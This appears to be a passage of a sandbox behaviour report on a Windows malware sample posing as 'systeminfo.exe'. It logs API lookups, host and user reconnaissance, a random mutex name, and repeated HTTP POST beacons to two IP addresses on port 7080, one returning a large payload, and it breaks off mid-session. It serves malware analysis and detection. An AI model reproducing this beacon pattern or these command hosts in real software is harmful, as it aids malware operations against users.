Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75a04442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75a014b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x75a1b6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x75a842ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75a05a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75a1eceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x757bae5f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x7570a4b4 True 1
Fn
Create Mapping C:\ProgramData\FB2F.tmp filename = C:\ProgramData\FB2F.tmp, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\ProgramData\FB2F.tmp process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (132)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 3
Fn
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Get Time type = Local Time, time = 2017-11-28 18:18:23 (Local Time) True 6
Fn
Get Time type = Ticks, time = 105066 True 1
Fn
Get Time type = Ticks, time = 105082 True 3
Fn
Get Time type = Ticks, time = 106408 True 1
Fn
Get Time type = Ticks, time = 111415 True 1
Fn
Get Time type = Ticks, time = 112414 True 1
Fn
Get Time type = Ticks, time = 113412 True 1
Fn
Get Time type = Ticks, time = 114411 True 1
Fn
Get Time type = Ticks, time = 115409 True 1
Fn
Get Time type = Ticks, time = 116423 True 1
Fn
Get Time type = Ticks, time = 117421 True 1
Fn
Get Time type = Ticks, time = 118420 True 1
Fn
Get Time type = Ticks, time = 119418 True 1
Fn
Get Time type = Ticks, time = 120417 True 1
Fn
Get Time type = Ticks, time = 121415 True 1
Fn
Get Time type = Ticks, time = 122413 True 1
Fn
Get Time type = Ticks, time = 123412 True 1
Fn
Get Time type = Ticks, time = 124410 True 1
Fn
Get Time type = Ticks, time = 125409 True 1
Fn
Get Time type = Ticks, time = 126423 True 1
Fn
Get Time type = Ticks, time = 127421 True 1
Fn
Get Time type = Ticks, time = 128420 True 1
Fn
Get Time type = Ticks, time = 129434 True 1
Fn
Get Time type = Ticks, time = 129902 True 3
Fn
Get Time type = Ticks, time = 129980 True 1
Fn
Get Time type = Ticks, time = 130416 True 1
Fn
Get Time type = Ticks, time = 130916 True 3
Fn
Get Time type = Ticks, time = 130994 True 1
Fn
Get Time type = Ticks, time = 131415 True 1
Fn
Get Time type = Ticks, time = 131914 True 1
Fn
Get Time type = Ticks, time = 131961 True 1
Fn
Get Time type = Ticks, time = 132117 True 1
Fn
Get Time type = Ticks, time = 132382 True 1
Fn
Get Time type = Ticks, time = 132554 True 1
Fn
Get Time type = Ticks, time = 132569 True 1
Fn
Get Time type = Ticks, time = 132912 True 3
Fn
Get Time type = Ticks, time = 132990 True 1
Fn
Get Time type = Ticks, time = 133412 True 1
Fn
Get Time type = Ticks, time = 133911 True 3
Fn
Get Time type = Ticks, time = 134020 True 1
Fn
Get Time type = Ticks, time = 134129 True 1
Fn
Get Time type = Ticks, time = 134410 True 1
Fn
Get Time type = Ticks, time = 134909 True 3
Fn
Get Time type = Ticks, time = 134987 True 1
Fn
Get Time type = Ticks, time = 135424 True 1
Fn
Get Time type = Ticks, time = 135908 True 3
Fn
Get Time type = Ticks, time = 135986 True 1
Fn
Get Time type = Ticks, time = 136422 True 1
Fn
Get Time type = Ticks, time = 136906 True 3
Fn
Get Time type = Ticks, time = 136984 True 1
Fn
Get Time type = Ticks, time = 137421 True 1
Fn
Get Time type = Ticks, time = 137670 True 1
Fn
Get Time type = Ticks, time = 137904 True 3
Fn
Get Time type = Ticks, time = 137982 True 1
Fn
Get Time type = Ticks, time = 138419 True 1
Fn
Get Time type = Ticks, time = 138903 True 3
Fn
Get Time type = Ticks, time = 138981 True 1
Fn
Get Time type = Ticks, time = 139433 True 1
Fn
Get Time type = Ticks, time = 139917 True 3
Fn
Get Time type = Ticks, time = 140588 True 2
Fn
Get Time type = Ticks, time = 140915 True 3
Fn
Get Time type = Ticks, time = 140993 True 1
Fn
Get Time type = Ticks, time = 141430 True 1
Fn
Get Time type = Ticks, time = 141914 True 3
Fn
Get Time type = Ticks, time = 141992 True 1
Fn
Get Time type = Ticks, time = 142413 True 1
Fn
Get Time type = Ticks, time = 142912 True 3
Fn
Get Time type = Ticks, time = 142990 True 1
Fn
Get Time type = Ticks, time = 143411 True 1
Fn
Get Time type = Ticks, time = 143910 True 3
Fn
Get Time type = Ticks, time = 143988 True 1
Fn
Get Time type = Ticks, time = 144410 True 1
Fn
Get Time type = Ticks, time = 144909 True 2
Fn
Get Time type = Ticks, time = 144987 True 1
Fn
Get Time type = Ticks, time = 145408 True 1
Fn
Get Time type = Ticks, time = 145907 True 2
Fn
Get Time type = Ticks, time = 146422 True 1
Fn
Get Time type = Ticks, time = 146906 True 1
Fn
Get Time type = Ticks, time = 147420 True 1
Fn
Get Time type = Ticks, time = 147904 True 1
Fn
Get Time type = Ticks, time = 148419 True 1
Fn
Get Time type = Ticks, time = 148902 True 1
Fn
Get Time type = Ticks, time = 149417 True 1
Fn
Get Info type = Operating System False 3
Fn
Get Info type = Hardware Information True 3
Fn
Mutex (7)
+
Operation Additional Information Success Count Logfile
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Fn
Release - True 1
Fn
Network Behavior
HTTP Sessions (21)
+
Information Value
Total Data Sent 6.79 KB (6955 bytes)
Total Data Received 435.79 KB (446252 bytes)
Contacted Host Count 2
Contacted Hosts 173.201.20.6, 159.203.94.198
HTTP Session #1
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 432.75 KB (443132 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 443124, size_out = 443124 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #2
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #3
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #4
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #5
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #6
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #7
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #8
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #9
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #10
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #11
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session - True 20
Fn
HTTP Session #12
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name 173.201.20.6
Server Port 7080
Data Sent 0.32 KB (331 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
